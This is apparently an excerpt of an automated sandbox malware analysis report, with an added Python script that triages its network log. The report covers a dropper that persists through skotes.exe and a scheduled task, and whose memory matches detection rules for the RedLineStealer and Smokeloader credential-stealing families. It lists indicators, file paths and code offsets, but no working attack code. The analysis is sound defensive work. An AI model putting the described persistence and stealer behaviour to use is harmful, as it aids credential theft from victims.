Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49973 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49974 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:50042 version: TLS 1.2
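The sandbox records each direction of a TCP flow as a separate "HTTP traffic on port" line and only names the server in the "HTTPS traffic detected" lines, so the two lists have to be joined on the client's ephemeral port before they say anything useful. The following is an added triage script, not part of the report or of Joe Sandbox; the sample lines are a small subset copied from this report's network section. It joins the two record types, counts flows per server address, and lists client ports that appear in the port lines but never get a TLS handshake record (port 49926 in the sample), which is the set worth pulling from the PCAP since it is either a failed handshake or not TLS at all.

```python
import re
from collections import defaultdict

# Sample lines taken from this report's network section (a subset, not the
# complete capture); the parser accepts any mix of the two line types.
SAMPLE_LINES = """\
Source: unknown Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49974 version: TLS 1.2
""".splitlines()

PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: ([\d.]+):(\d+) -> ([\d.]+):(\d+) version: (TLS [\d.]+)"
)


def parse_flows(lines):
    """Return (client_ports, tls_by_port).

    client_ports: every ephemeral client port seen talking to 443 in either direction.
    tls_by_port:  client_port -> (server_ip, tls_version) for ports with a handshake record.
    """
    client_ports = set()
    tls_by_port = {}
    for line in lines:
        m = PORT_RE.search(line)
        if m:
            a, b = int(m.group(1)), int(m.group(2))
            # The sandbox logs both directions; the client port is whichever side is not 443.
            client_ports.add(b if a == 443 else a)
            continue
        m = TLS_RE.search(line)
        if m:
            server_ip, _server_port, _client_ip, client_port, version = m.groups()
            tls_by_port[int(client_port)] = (server_ip, version)
    return client_ports, tls_by_port


def summarize(lines):
    """Group handshake records per server and list flows that never got one."""
    client_ports, tls_by_port = parse_flows(lines)
    per_server = defaultdict(list)
    for port, (ip, _version) in tls_by_port.items():
        per_server[ip].append(port)
    unresolved = sorted(client_ports - set(tls_by_port))
    return {
        "per_server": {ip: sorted(ports) for ip, ports in per_server.items()},
        "unresolved_ports": unresolved,
    }


if __name__ == "__main__":
    for ip, ports in summarize(SAMPLE_LINES)["per_server"].items():
        print(f"{ip}: {len(ports)} TLS flows on client ports {ports}")
    print("no handshake record:", summarize(SAMPLE_LINES)["unresolved_ports"])
```

Run over the full network section, the join shows fifteen of the seventeen handshakes going to 104.21.64.1, an address in Cloudflare's range shared by many tenants, so the hostname from the report's DNS section, not the IP, is the indicator to act on.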

System Summary

Source: 00000007.00000002.3265730716.0000000000FFC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.3279910131.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: ba17bbfb21.exe, 0000000B.00000002.3194386177.0000000000672000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c65cbd94-e
Source: ba17bbfb21.exe, 0000000B.00000002.3194386177.0000000000672000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_2e0a1f05-7
Source: ba17bbfb21.exe.6.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3992bab5-c
Source: ba17bbfb21.exe.6.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_c55e8ce8-b
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: 4611cc433b.exe.6.dr Static PE information: section name:
Source: 4611cc433b.exe.6.dr Static PE information: section name: .idata
Source: 4611cc433b.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 79ddad050f.exe.6.dr Static PE information: section name:
Source: 79ddad050f.exe.6.dr Static PE information: section name: .idata
Source: 79ddad050f.exe.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: e051bdf457.exe.6.dr Static PE information: section name:
Source: e051bdf457.exe.6.dr Static PE information: section name: .idata
Source: e051bdf457.exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: 734386a52c.exe.6.dr Static PE information: section name:
Source: 734386a52c.exe.6.dr Static PE information: section name: .idata
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0020CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 6_2_0020CB97
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD78BB 0_2_00AD78BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD8860 0_2_00AD8860
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD7049 0_2_00AD7049
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD31A8 0_2_00AD31A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA81D3 0_2_00BA81D3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A94B30 0_2_00A94B30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA7B6E 0_2_00BA7B6E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A94DE0 0_2_00A94DE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD2D10 0_2_00AD2D10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AD779B 0_2_00AD779B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC7F36 0_2_00AC7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00238860 2_2_00238860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00237049 2_2_00237049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_002378BB 2_2_002378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_002331A8 2_2_002331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_001F4B30 2_2_001F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00232D10 2_2_00232D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_001F4DE0 2_2_001F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00227F36 2_2_00227F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0023779B 2_2_0023779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_00238860 3_2_00238860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_00237049 3_2_00237049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_002378BB 3_2_002378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_002331A8 3_2_002331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_001F4B30 3_2_001F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_00232D10 3_2_00232D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_001F4DE0 3_2_001F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_00227F36 3_2_00227F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_0023779B 3_2_0023779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_001FE530 6_2_001FE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00216192 6_2_00216192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00238860 6_2_00238860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_001F4B30 6_2_001F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00232D10 6_2_00232D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_001F4DE0 6_2_001F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00210E13 6_2_00210E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00237049 6_2_00237049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002331A8 6_2_002331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00211602 6_2_00211602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0023779B 6_2_0023779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002378BB 6_2_002378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00213DF1 6_2_00213DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00227F36 6_2_00227F36
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D1FD00 7_3_04D1FD00
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D1DF87 7_3_04D1DF87
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D29706 7_3_04D29706
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D13120 7_3_04D13120
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D122C0 7_3_04D122C0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D1E2C9 7_3_04D1E2C9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D24AEE 7_3_04D24AEE
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D1AA90 7_3_04D1AA90
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D25219 7_3_04D25219
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_3_04D14350 7_3_04D14350
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00402EC0 7_2_00402EC0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00404F50 7_2_00404F50
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00410900 7_2_00410900
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0041A306 7_2_0041A306
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040EB87 7_2_0040EB87
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00403D20 7_2_00403D20
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00415E19 7_2_00415E19
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040EEC9 7_2_0040EEC9
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_004156EE 7_2_004156EE
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040B690 7_2_0040B690
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_1000E184 7_2_1000E184
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_100102A0 7_2_100102A0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099A491 7_2_0099A491
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_009954B8 7_2_009954B8
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_009390A7 7_2_009390A7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_008258DC 7_2_008258DC
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_009A10F3 7_2_009A10F3
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_008B782B 7_2_008B782B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0085252E 7_2_0085252E
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099397E 7_2_0099397E
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099DA9C 7_2_0099DA9C
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00991EBE 7_2_00991EBE
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0099C618 7_2_0099C618
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00998A27 7_2_00998A27
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00944675 7_2_00944675
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0084C79E 7_2_0084C79E
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0091C7F6 7_2_0091C7F6
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0086FBEA 7_2_0086FBEA
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00939B50 7_2_00939B50
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0094BB62 7_2_0094BB62
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00AAEE5A 7_2_00AAEE5A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00A20315 7_2_00A20315
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B751B7 7_2_04B751B7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7EDEE 7_2_04B7EDEE
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B73F87 7_2_04B73F87
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7B8F7 7_2_04B7B8F7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B751B7 7_2_04B751B7
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7F130 7_2_04B7F130
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B85955 7_2_04B85955
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B80B67 7_2_04B80B67
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EAD2AC 9_2_61EAD2AC
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E4B8A1 9_2_61E4B8A1
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E75F1F 9_2_61E75F1F
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E40065 9_2_61E40065
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9E24F 9_2_61E9E24F
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E5023C 9_2_61E5023C
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E62554 9_2_61E62554
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9A4A7 9_2_61E9A4A7
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E4E4BF 9_2_61E4E4BF
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E94783 9_2_61E94783
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E7A790 9_2_61E7A790
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E18736 9_2_61E18736
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E86668 9_2_61E86668
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E58670 9_2_61E58670
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E10856 9_2_61E10856
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EA0BA9 9_2_61EA0BA9
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E62CA3 9_2_61E62CA3
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E98FE2 9_2_61E98FE2
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E88FCA 9_2_61E88FCA
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E52F80 9_2_61E52F80
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EA2F47 9_2_61EA2F47
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E56F18 9_2_61E56F18
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E4CEF9 9_2_61E4CEF9
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E1EEFF 9_2_61E1EEFF
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E64E0C 9_2_61E64E0C
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EA91F6 9_2_61EA91F6
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9316A 9_2_61E9316A
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9F0ED 9_2_61E9F0ED
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EA70CF 9_2_61EA70CF
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9D0C3 9_2_61E9D0C3
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E8D0B6 9_2_61E8D0B6
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E6904E 9_2_61E6904E
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E4304E 9_2_61E4304E
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E15337 9_2_61E15337
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E19208 9_2_61E19208
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E534E3 9_2_61E534E3
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E77452 9_2_61E77452
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E37930 9_2_61E37930
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E7B85E 9_2_61E7B85E
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E21816 9_2_61E21816
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E9FBF0 9_2_61E9FBF0
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E55BD7 9_2_61E55BD7
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EA5B62 9_2_61EA5B62
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E91DC1 9_2_61E91DC1
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E6DDA5 9_2_61E6DDA5
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E31DAB 9_2_61E31DAB
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E95D7A 9_2_61E95D7A
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E5BC4C 9_2_61E5BC4C
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E25FA2 9_2_61E25FA2
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E1DEC2 9_2_61E1DEC2
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E69E8F 9_2_61E69E8F
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61E89E0E 9_2_61E89E0E
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00AA80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: String function: 0040A760 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: String function: 04D19B60 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: String function: 04B7A9C7 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0020DF80 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0020D942 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0020D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 0020D64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00228E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00207A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 002080C0 appears 393 times
Source: random[1].exe.6.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 4611cc433b.exe.6.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000007.00000002.3265730716.0000000000FFC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
